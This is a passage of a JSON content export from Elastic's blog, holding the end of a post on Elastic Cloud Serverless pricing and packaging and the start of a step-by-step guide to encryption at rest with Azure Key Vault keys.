(VCU)\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e, $0.09 per Search VCU, $0.047 per GB/month for Retention\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eWe also offer different packages along with a few supplemental add-ons, giving you flexibility to tailor pricing to meet your needs. For example:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eSecurity Analytics Essentials provides traditional SIEM for $0.17–$0.50\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003csup\u003e*\u003c/sup\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e per GB ingested, $0.018–$0.036\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003csup\u003e*\u003c/sup\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e per GB/month for Search AI Lake.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eSecurity Analytics Complete extends SIEM to an AI-driven security analytics platform for $0.20–$0.60\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003csup\u003e*\u003c/sup\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e per GB ingested, $0.020–$.040\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003csup\u003e*\u003c/sup\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e per GB/month for Search AI Lake.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eEndpoint Protection is also available as an add-on for $1.25 per endpoint (when purchased with Essentials) or $1.50 per endpoint (when purchased with Complete).\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003csup\u003e*\u003c/sup\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003eVolume tiered pricing is now available and applied automatically based on consumption.\u0026nbsp;For example, pricing for Security Analytics Essentials starts at $0.50 per GB ingested but can go as low as $0.17 per GB ingested at the highest volume tier. Additional details can be found on each solution pricing page linked above.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Simplified pricing metrics","_metadata":{"uid":"csa6030159d2d44689"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWhen we chose to introduce three new offerings as part of Elastic Cloud Serverless, we wanted to deliver dedicated experiences in the product as well as in the pricing model. Unlike our approach with Elastic Cloud Hosted pricing, which is based on provisioned capacity of a specific Cloud instance type, serverless is priced based on metrics that are aligned with the solution domain, making it simpler and easier to forecast usage.\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eSimplicity:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e For \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eSecurity\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e and \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eObservability\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, this means pricing is based on the amount of data ingested and the size of the data retained in the \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/search-ai-lake-elastic-cloud-serverless\"\u003e\u003cspan style='font-size: 12pt;'\u003eSearch AI Lake\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e. For any optional add-ons you choose, these will also have simple pricing metrics. Details can be found \u003c/span\u003e\u003ca href=\"https://www.elastic.co/pricing/serverless-security\"\u003e\u003cspan style='font-size: 12pt;'\u003ehere\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e for Security and \u003c/span\u003e\u003ca href=\"https://www.elastic.co/pricing/serverless-observability\"\u003e\u003cspan style='font-size: 12pt;'\u003ehere\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e for Observability.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eSimplicity plus configurability:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e For \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eElasticsearch\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, pricing is based on Virtual Compute Units (VCUs). Think of VCUs as a vertical slice of a virtual host with 1GB of RAM and associated local disk and vCPU. You are charged for each VCU consumed for Ingest, Search, and Machine Learning. For the data stored in the Search AI Lake, there is a GB/month charge. The number of VCUs is automatically adjusted based on your workload, with changes in ingestion or searches affecting the number of Ingest or Search VCUs you use. Additional details can be found \u003c/span\u003e\u003ca href=\"https://www.elastic.co/pricing/serverless-search\"\u003e\u003cspan style='font-size: 12pt;'\u003ehere\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e for Elasticsearch.\u003c/span\u003e\u003c/li\u003e\u003c/ul\u003e"},{"title_l10n":"Consumption friendly","_metadata":{"uid":"csc8a3b33cc115c977"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAt Elastic, we make it easy to purchase Elastic Cloud — either directly from us or via the AWS, Google Cloud, or Azure Marketplaces. Both options use our Cloud consumption model, which is billed monthly for pay-as-you-go customers or allows you to pre-purchase \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/cloud/current/ec-billing-ecu.html\"\u003e\u003cspan style='font-size: 12pt;'\u003eElastic Consumption Units\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e (ECUs) at a discount. If you are a current Elastic Cloud customer using our prepaid consumption model, and you have an ECU balance, you can use those ECUs for any Elastic Cloud offering — Hosted and/or Serverless. Any future ECU purchases can also be used for our Cloud Hosted and/or Serverless models. If you are a Cloud monthly customer, you can choose a hosted deployment or serverless project, which will all accumulate toward your bill.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Mix and match product tier and support tier","_metadata":{"uid":"csb4d24b3987b1a45c"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWith serverless, you can now choose one of our \u003c/span\u003e\u003ca href=\"https://www.elastic.co/support/welcome\"\u003e\u003cspan style='font-size: 12pt;'\u003efour support tiers\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e for your entire Elastic Cloud organization. Unlike Elastic Self-Managed and Elastic Cloud Hosted, you can choose the features you use in Elastic Cloud Serverless on a per-project basis. So your Elastic Cloud organization can be at the highest support tier (Premium), but you can have one or more Elastic Security Serverless projects that use the Essentials product tier. Similarly, your Elastic Cloud organization can be set to the Basic support tier, but you have one or more of your Elastic Security Serverless projects use the Complete product tier. Note that the support tier you select must be the same across your entire cloud organization.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Pricing and packaging built for you","_metadata":{"uid":"cs78334b240839aae6"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWith our Elastic Cloud \u003c/span\u003e\u003ca href=\"https://www.elastic.co/pricing/serverless-search\"\u003e\u003cspan style='font-size: 12pt;'\u003eServerless pricing and packaging\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e, we have simplified getting started and growing with Elastic so you can focus on results. Our solution packaging closely matches how you use Elastic. The Elastic Cloud Serverless pricing dimensions are simple, intuitive, and easy to forecast usage. We are also maintaining and even increasing the flexibility that Elastic is known for, allowing you to keep using the same customer-friendly consumption models for your serverless consumption.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"","_metadata":{"uid":"cs929a74b0f3bf6303"},"header_style":"H2","paragraph_l10n":"\u003cspan style=\"font-size: 10pt;\"\u003e\u003cem\u003eOriginally published on May 15, 2024; Updated on December 2, 2024.\u003c/em\u003e\u003c/span\u003e"}],"_metadata":{"uid":"cs850ec1db22df9860"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs430d1052a4fafc17"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 10pt;\"\u003e\u003cem\u003eThe release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csb2082e172d962a0f"}}}],"publish_date":"2024-12-02","sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"With Elastic Cloud Serverless, we are simplifying and offering increased flexibility with our new solution-specific pricing and packaging for Security, Observability, and Elasticsearch.","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[{"_version":1,"locale":"en-us","uid":"bltc3067ddccda555c1","ACL":{},"created_at":"2023-11-06T21:50:08.806Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"elastic-cloud","label_l10n":"Elastic Cloud","tags":[],"title":"Elastic Cloud","updated_at":"2023-11-06T21:50:08.806Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.096Z","user":"blt4b2e1169881270a8"}}],"tags_industry":[],"tags_partner":[],"tags_topic":[{"title":"Architecture","label_l10n":"Architecture","keyword":"architecture","hidden_value":true,"tags":[],"locale":"en-us","uid":"blt91896b1dfcbd6413","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2020-06-17T03:39:38.693Z","updated_at":"2020-06-17T03:39:38.693Z","_content_type_uid":"tags_topic","ACL":{},"_version":1,"_workflow":{"uid":"blte3b720fd9661d254","updated_at":"2020-06-17T03:39:38.693Z","updated_by":"blt3044324473ef223b70bc674c","version":1},"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2020-06-24T15:31:11.375Z","user":"bltf6ab93733e4e3a73"}},{"title":"Ingesting","label_l10n":"Ingesting","keyword":"ingesting","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt886805f7b26ef356","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2020-06-17T03:37:57.513Z","updated_at":"2020-06-17T03:37:57.513Z","_content_type_uid":"tags_topic","ACL":{},"_version":1,"_workflow":{"uid":"blte3b720fd9661d254","updated_at":"2020-06-17T03:37:57.513Z","updated_by":"blt3044324473ef223b70bc674c","version":1},"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2020-06-29T17:20:06.688Z","user":"bltea6cbb86fea188be"}}],"tags_use_case":[{"_version":2,"locale":"en-us","uid":"bltdeb5e512cabf0e10","ACL":{},"created_at":"2023-11-03T17:34:50.549Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"platform","label_l10n":"Platform","tags":[],"title":"Platform","updated_at":"2023-11-03T17:34:53.443Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.235Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"bltbc86a233655f4b8e","ACL":{},"created_at":"2022-09-13T16:43:08.111Z","created_by":"blt36e890d06c5ec32c","hidden_value":false,"keyword":"elasticsearch","label_l10n":"Elasticsearch","tags":[],"title":"Elasticsearch","updated_at":"2022-09-13T16:43:08.111Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.253Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":{"uid":"blte4a85686c1a69b90","_version":1,"is_dir":false,"ACL":{},"content_type":"image/jpeg","created_at":"2024-05-14T20:05:06.177Z","created_by":"bltb6c155cd84fc0c1a","file_size":"179633","filename":"dark_blue_sky.jpg","parent_uid":null,"tags":[],"title":"dark blue sky.jpg","updated_at":"2024-05-14T20:05:06.177Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-05-15T12:45:01.135Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blte4a85686c1a69b90/6643c3f2bfbef50de95f5ccb/dark_blue_sky.jpg"},"title":"Elastic Cloud Serverless pricing and packaging","title_l10n":"Elastic Cloud Serverless pricing and packaging","updated_at":"2024-12-18T14:12:00.661Z","updated_by":"bltb6c155cd84fc0c1a","url":"/blog/elastic-cloud-serverless-pricing-packaging","publish_details":{"time":"2024-12-18T14:12:06.942Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt29d5f9b1d3b4faab","_version":10,"locale":"en-us","ACL":{},"abstract_l10n":"Follow this step-by-step process to implement encryption at rest with Azure Key Vault keys and Elastic Cloud deployments to create a secure and compliant environment for your sensitive data.","author":["bltd40b1c822e24d3a9","blt3f02e05e41c2a581","bltcc6b80deaa2c967f"],"category":["bltb79594af7c5b4199"],"created_at":"2024-08-20T14:22:48.673Z","created_by":"bltb6c155cd84fc0c1a","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csc7d4fc697bf7a2f6"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eIn the first \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/encryption-at-rest-elastic-cloud-enterprise-security\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eblog\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e in this series, we unpacked the foundational concepts of encryption at rest and introduced you to Elastic Cloud’s “bring your own key” (BYOK) feature, which allows you to do encryption at rest with encryption keys managed by the KMS service of your cloud provider. The second \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/encryption-at-rest-elastic-cloud-aws-kms\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eblog\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e of this series dives into the technical nuances of implementing encryption at rest with AWS KMS keys. Building on that knowledge, this blog dives into the technical nuances of implementing encryption at rest with Azure Key Vault keys and Elastic Cloud deployments, providing you with a secure and compliant environment for your sensitive data.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eFirst, let’s walk through the architecture of the solution and its prerequisites, and then we’ll explore how to create an Azure Key Vault key and apply it to an Elastic Cloud Hosted deployment for encrypting data and snapshots at rest. We’ll also show you how to validate your setup and implement additional security policies, such as encryption key rotation and revocation.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"The Elastic Cloud and Azure Key Vault integration","_metadata":{"uid":"cs14b8bfb2cd89a7f9"},"header_style":"H2","paragraph_l10n":""},{"title_l10n":"Architecture","_metadata":{"uid":"cscc7c9986ef6f354b"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe following diagram showcases how Elastic Cloud integrates with Azure Key Vault to provide your application with Hosted Stack deployments encrypted with your own Key Vault keys.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csca43f76b0d12c909"}}},{"image":{"image":{"uid":"bltae00e3c1325e4573","_version":1,"title":"image13.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-08-20T14:09:32.707Z","updated_at":"2024-08-20T14:09:32.707Z","content_type":"image/png","file_size":"279078","filename":"image13.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-08-20T14:39:12.195Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltae00e3c1325e4573/66c4a39c0388811b011eeee6/image13.png"},"_metadata":{"uid":"cs506ccc42808ce34b"},"caption_l10n":"","alt_text_l10n":"architecture","disable_lightbox":false,"remove_shadow":true,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"Prerequisites","_metadata":{"uid":"cs89972a22cc62be9d"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003e1. Get your own key: \u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003eTo use BYOK, you need a key that you control. You set this up in your Azure Key Vault account. Create an RSA asymmetric key. The key must be available in each region you have deployments to encrypt. You can use the same key to encrypt multiple deployments, although security best practices recommend using a different one per deployment. Later, you'll need to provide the Key Vault Key URI and the key name to Elastic Cloud.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003e2. Upgrade to Enterprise:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e BYOK is available for the Enterprise subscription level. This means if you're using Elastic on Azure, you can encrypt your data using your own key.\u0026nbsp;\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eKeep in mind, i\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003ef you're using a custom snapshot repository instead of Elastic Cloud's default one, your snapshots won't automatically be encrypted with your key. However, the file system itself will still encrypt data being stored on disk.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003e3. Access control:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e Create Azure Identity and Access Management (IAM) policies to control access to the Elastic cluster.\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eThe following are required permissions on Azure:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003ePermissions to create an RSA key in the Azure Key Vault where you want to store your key\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eMembership in the Application Administrator role (This is required to create a new service principal for Elastic Cloud in your Azure tenant.)\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003ePermissions to assign roles in your Key Vault using access control (IAM) (This is required to grant the service principal access to your key.)\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eThe Azure Key Vault where the RSA key will be stored must have purge protection enabled to support the encryption of snapshots.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e"},{"title_l10n":"Creating and configuring an Azure Key Vault key","_metadata":{"uid":"cse2f6c58683bf2aa2"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e1. To start the key creation process, go to the Key Vault service in the Azure portal. Click \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eKeys\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csc42770a7d6fea4b9"}}},{"image":{"image":{"uid":"blt9624a583756c23cc","_version":1,"title":"image5.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-08-20T14:23:06.709Z","updated_at":"2024-08-20T14:23:06.709Z","content_type":"image/png","file_size":"46243","filename":"image5.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-08-20T14:39:12.388Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt9624a583756c23cc/66c4a6ca5c9bfed96e0f0b6c/image5.png"},"_metadata":{"uid":"cs825f0ca9ad87d5df"},"caption_l10n":"","alt_text_l10n":"click keys","disable_lightbox":false,"remove_shadow":true,"sizing":{"sizing_options":"width-small: 25%"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csd00c44a68f8e7b74"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e2. In the key creation process, select \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eGenerate/Import\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e and specify the key type and key size.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e3. Provide a name for the key and click \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eCreate\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs28d2c58f2aaed5b5"}}},{"image":{"image":{"uid":"blt5f8b531747d7c2aa","_version":1,"title":"image11.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-08-20T14:23:33.165Z","updated_at":"2024-08-20T14:23:33.165Z","content_type":"image/png","file_size":"196877","filename":"image11.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-08-20T14:39:12.348Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt5f8b531747d7c2aa/66c4a6e55c9bfe37ea0f0b73/image11.png"},"_metadata":{"uid":"csb365c4c2f6d7af08"},"caption_l10n":"","alt_text_l10n":"create a key","disable_lightbox":false,"remove_shadow":true,"sizing":{"sizing_options":"width-large: 75%"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csb90268d37b31be37"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e4. Add the necessary principal (Elastic service principal) to the access policy and click \u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eSave\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e. The service principal grants Elastic Cloud access to interact with your RSA key.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eIn your Azure Portal, view the key that you created. In the Access control (IAM) settings for the key, grant the service principal the role \u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eKey Vault Crypto User\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e5. Copy the \u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eKey Identifier\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e and the key name from the Overview tab. Save them in a safe place for use in a later step.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csdeb5a30358911051"}}},{"image":{"image":{"uid":"blt02d8909ad824da0e","_version":1,"title":"image7.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-08-20T14:24:33.797Z","updated_at":"2024-08-20T14:24:33.797Z","content_type":"image/png","file_size":"168095","filename":"image7.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-08-20T14:39:12.399Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt02d8909ad824da0e/66c4a721ab1b6940163ca5ee/image7.png"},"_metadata":{"uid":"cs745de582423d3941"},"caption_l10n":"","alt_text_l10n":"key identifier","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":"width-large: 75%"}}},{"title_text":{"title_text":[{"title_l10n":"Integrating an Azure Key Vault key with Elastic Cloud","_metadata":{"uid":"cs644bc930ca342af3"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e1. Now you can create a new Elastic deployment that uses the Azure Key Vault key you just created. Start by signing in to the Elastic Cloud console.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csddfa8af81f84fbf7"}}},{"image":{"image":{"uid":"bltf418b39a7570da16","_version":1,"title":"image1.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-08-20T14:24:41.901Z","updated_at":"2024-08-20T14:24:41.901Z","content_type":"image/png","file_size":"119683","filename":"image1.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-08-20T14:39:12.363Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltf418b39a7570da16/66c4a729ab1b6930633ca5f4/image1.png"},"_metadata":{"uid":"csbbea8a6af9bd7d0b"},"caption_l10n":"","alt_text_l10n":"Elastic Cloud console","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs5a1d3985ba9a605c"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e2. After you’ve signed in to the console, click the \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eCreate deployment\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e button.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csc48ec5c5510e3d25"}}},{"image":{"image":{"uid":"blt2bb198045e5dbfc1","_version":1,"title":"image8.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-08-20T14:24:50.819Z","updated_at":"2024-08-20T14:24:50.819Z","content_type":"image/png","file_size":"45753","filename":"image8.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-08-20T14:39:12.277Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt2bb198045e5dbfc1/66c4a7323bab118481a2c150/image8.png"},"_metadata":{"uid":"cs83976710069daa83"},"caption_l10n":"","alt_text_l10n":"create deployment","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs6a28bc14991e8058"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e3. Enter a Name for your deployment and select \u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eMicrosoft Azure\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e as your Cloud provider. Then expand the \u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eAdvanced setting\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003es\u003c/strong\u003e section and enable the \u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eUse a customer-managed encryption key option\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e. Paste in the Azure Key Vault RSA Key Identifier (URI) and key name that you copied in the previous step.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csa2490bcbe539508d"}}},{"image":{"image":{"uid":"bltd2ca2e00783c0893","_version":1,"title":"Screenshot 2024-08-20 at 10.18.59 AM.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-08-20T14:19:15.774Z","updated_at":"2024-08-20T14:19:15.774Z","content_type":"image/png","file_size":"82066","filename":"Screenshot_2024-08-20_at_10.18.59_AM.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-08-20T14:39:12.328Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltd2ca2e00783c0893/66c4a5e34b8e147d10bc740d/Screenshot_2024-08-20_at_10.18.59_AM.png"},"_metadata":{"uid":"cse7b7f3b2718d3a6e"},"caption_l10n":"","alt_text_l10n":"create a deployment","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":"width-large: 